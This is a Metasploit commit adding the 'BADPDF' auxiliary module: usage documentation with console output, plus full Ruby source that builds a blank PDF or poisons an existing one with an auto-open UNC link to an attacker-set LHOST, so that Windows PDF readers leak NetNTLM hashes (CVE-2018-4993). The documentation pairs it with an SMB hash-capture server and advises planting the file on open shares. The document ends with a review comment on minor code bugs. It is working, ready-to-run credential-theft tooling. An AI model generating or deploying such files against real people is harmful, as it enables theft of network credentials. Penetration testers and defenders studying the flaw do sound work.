Land #10148, Add New Module - Badpdf

Merge branch 'land-10148' into upstream-master
4.x
bwatters-r7 2018-06-12 17:19:32 -05:00 committed by Metasploit
parent 0a19221af2
commit 7e2c1fae2c
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 250 additions and 0 deletions


@ -0,0 +1,92 @@
This module will either create a blank pdf document which contains a UNC link which will connect back to LHOST if file FILENAME options is used
or if PDFINJECT option is used will try and inject the necessary UNC code into an existing PDF document.
## Vulnerable Application
Various PDF Readers. Note Adobe released the patch APSB18-09 to prevent this and
FoxIT after version 9.1 is no longer vulnerable.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: ```use auxiliary/fileformat/badpdf```
4. Customise Options as required
5. Do: ```run```
6. A file pointing back to the listening host will then be generated.
7. Configure auxiliary/server/capture/smb or similar to capture hashes.
8. Upload the document to an open share or similar and wait for hashes.
## Options
**FILENAME**
This option allows you to customise the generated filename.
This can be changed using set FILENAME test.pdf
**LHOST**
This option allows you to set the IP address of the SMB Listener that the document points to
This can be changed using set LHOST 192.168.1.25
**PDFINJECT**
This option allows you to inject the UNC code into an existing PDF document
This can be changed using set PDFINJECT /path/to/file/pdf.pdf
## Scenarios
### Microsoft Windows
```
Console output
```
```
msf auxiliary(fileformat/badpdf) > show info
Name: BADPDF Malicious PDF Creator
Module: auxiliary/fileformat/badpdf
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Richard Davy - secureyourit.co.uk
CheckPoint researchers - Assaf Baharav, Yaron Fruchtmann, Ido Solomon
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no Filename
LHOST yes Host listening for incoming SMB/WebDAV traffic
PDFINJECT no Path and filename to existing PDF to inject UNC link code into
Description:
This module can either creates a blank PDF file which contains a UNC
link which can be used to capture NetNTLM credentials, or if the
PDFINJECT option is used it will inject the necessary code into an
existing PDF document if possible.
References:
https://cvedetails.com/cve/CVE-2018-4993/
https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/
msf auxiliary(fileformat/badpdf) >
msf auxiliary(fileformat/badpdf) > set filename test.pdf
filename => test.pdf
msf auxiliary(fileformat/badpdf) > set lhost 192.168.1.28
lhost => 192.168.1.28
msf auxiliary(fileformat/badpdf) > exploit
[+] test.pdf stored at /root/.msf4/local/test.pdf
[\*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) > set filename ""
filename =>
msf auxiliary(fileformat/badpdf) > set pdfinject /root/Desktop/example.pdf
pdfinject => /root/Desktop/example.pdf
msf auxiliary(fileformat/badpdf) > exploit
[+] Malicious file writen to /root/Desktop/example_malicious.pdf
[\*] Auxiliary module execution completed
msf auxiliary(fileformat/badpdf) >
```


@ -0,0 +1,158 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'BADPDF Malicious PDF Creator',
'Description' => '
This module can either creates a blank PDF file which contains a UNC link which can be used
to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary
code into an existing PDF document if possible.
',
'License' => MSF_LICENSE,
'Author' =>
[
'Assaf Baharav', # Code provided as POC by CheckPoint
'Yaron Fruchtmann', # Code provided as POC by CheckPoint
'Ido Solomon', # Code provided as POC by CheckPoint
'Richard Davy - secureyourit.co.uk', # Metasploit
],
'Platform' => ['win'],
'References' =>
[
['CVE', '2018-4993'],
['URL', 'https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/']
])
)
register_options(
[
OptAddress.new('LHOST', [true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
OptString.new('FILENAME', [false, 'Filename']),
OptPath.new('PDFINJECT', [false, 'Path and filename to existing PDF to inject UNC link code into'])
]
)
end
def run
if datastore['PDFINJECT'].to_s.end_with?('.pdf') && datastore['FILENAME'].to_s.end_with?('.pdf')
print_error 'Please configure either FILENAME or PDFINJECT'
elsif !datastore['PDFINJECT'].nil? && datastore['PDFINJECT'].to_s.end_with?('.pdf')
injectpdf
elsif !datastore['FILENAME'].nil? && datastore['FILENAME'].to_s.end_with?('.pdf')
createpdf
else
print_error 'FILENAME or PDFINJECT must end with '.pdf' file extension'
end
end
def injectpdf
# Payload which gets injected
inject_payload = "/AA <</O <</F (\\\\\\\\#{datastore['LHOST']}\\\\test)/D [ 0 /Fit]/S /GoToE>>>>"
# if given path doesn't exist display error and return
unless File.exist?(datastore['PDFINJECT'])
# If file not found display error message
print_error "File doesn't exist #{datastore['PDFINJECT']}"
return
end
# Read in contents of file
content = File.read(datastore['PDFINJECT'])
# Check for place holder - below ..should.. cover most scenarios.
newdata = ''
[2, 4, 6, 8].each do |pholder|
unless content.index("/Contents #{pholder} 0 R").nil?
# If place holder exists create new file content
newdata = content[0..(content.index("/Contents #{pholder} 0 R") + 14)] + inject_payload + content[(content.index("/Contents #{pholder} 0 R") + 15)..-1]
break
end
end
# Display error message if we couldn't poison the file
if newdata.empty?
print_error 'Could not find placeholder to poison file this time....'
return
end
# Create new filename by replacing .pdf with _malicious.pdf
newfilename = "#{datastore['PDFINJECT'].gsub(/\.pdf$/, '')}_malicious.pdf"
# Write content to file
File.open(newfilename, 'wb') { |file| file.write(newdata) }
# Check file exists and display path or error message
if File.exist?(newfilename)
print_good("Malicious file writen to: #{newfilename}")
else
print_error 'Something went wrong creating malicious PDF file'
end
end
def createpdf
# Code below taken POC provided by CheckPoint Research
pdf = ''
pdf << "%PDF-1.7\n"
pdf << "1 0 obj\n"
pdf << "<</Type/Catalog/Pages 2 0 R>>\n"
pdf << "endobj\n"
pdf << "2 0 obj\n"
pdf << "<</Type/Pages/Kids[3 0 R]/Count 1>>\n"
pdf << "endobj\n"
pdf << "3 0 obj\n"
pdf << "<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Resources<<>>>>\n"
pdf << "endobj\n"
pdf << "xref\n"
pdf << "0 4\n"
pdf << "0000000000 65535 f\n"
pdf << "0000000015 00000 n\n"
pdf << "0000000060 00000 n\n"
pdf << "0000000111 00000 n\n"
pdf << "trailer\n"
pdf << "<</Size 4/Root 1 0 R>>\n"
pdf << "startxref\n"
pdf << "190\n"
pdf << "3 0 obj\n"
pdf << "<< /Type /Page\n"
pdf << " /Contents 4 0 R\n"
pdf << " /AA <<\n"
pdf << " /O <<\n"
pdf << " /F (\\\\\\\\#{datastore['LHOST']}\\\\test)\n"
pdf << " /D [ 0 /Fit]\n"
pdf << " /S /GoToE\n"
pdf << " >>\n"
pdf << " >>\n"
pdf << " /Parent 2 0 R\n"
pdf << " /Resources <<\n"
pdf << " /Font <<\n"
pdf << " /F1 <<\n"
pdf << " /Type /Font\n"
pdf << " /Subtype /Type1\n"
pdf << " /BaseFont /Helvetica\n"
pdf << " >>\n"
pdf << " >>\n"
pdf << " >>\n"
pdf << ">>\n"
pdf << "endobj\n"
pdf << "4 0 obj<< /Length 100>>\n"
pdf << "stream\n"
pdf << "BT\n"
pdf << "/TI_0 1 Tf\n"
pdf << "14 0 0 14 10.000 753.976 Tm\n"
pdf << "0.0 0.0 0.0 rg\n"
pdf << "(PDF Document) Tj\n"
pdf << "ET\n"
pdf << "endstream\n"
pdf << "endobj\n"
pdf << "trailer\n"
pdf << "<<\n"
pdf << " /Root 1 0 R\n"
pdf << ">>\n"
pdf << "%%EOF\n"
# Write data to filename
file_create(pdf)
end
end
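Review bot: The else branch of `run` cannot print its message as rendered: `print_error 'FILENAME or PDFINJECT must end with '.pdf' file extension'` has unescaped single quotes, so Ruby parses it as a `.pdf` method call on the first string and the branch raises NoMethodError instead of reporting the misconfiguration; write it as `print_error "FILENAME or PDFINJECT must end with '.pdf' file extension"`. In `injectpdf` the source PDF is read with `File.read` but the result is written with `'wb'`; reading a binary file in text mode exposes it to newline translation and default-external-encoding coercion on some platforms, so `content = File.binread(datastore['PDFINJECT'])` keeps the bytes intact. The `.nil?` guards in the two `elsif` conditions are redundant with the `.to_s.end_with?` calls that follow them, and the `/\.pdf$/` used to derive the output name would be tighter as `/\.pdf\z/`. `injectpdf` also writes beside the user-supplied input path while `createpdf` goes through `file_create` into the local store; if that asymmetry is intended it deserves a comment, and the `print_good` message there misspells "written" as `writen`.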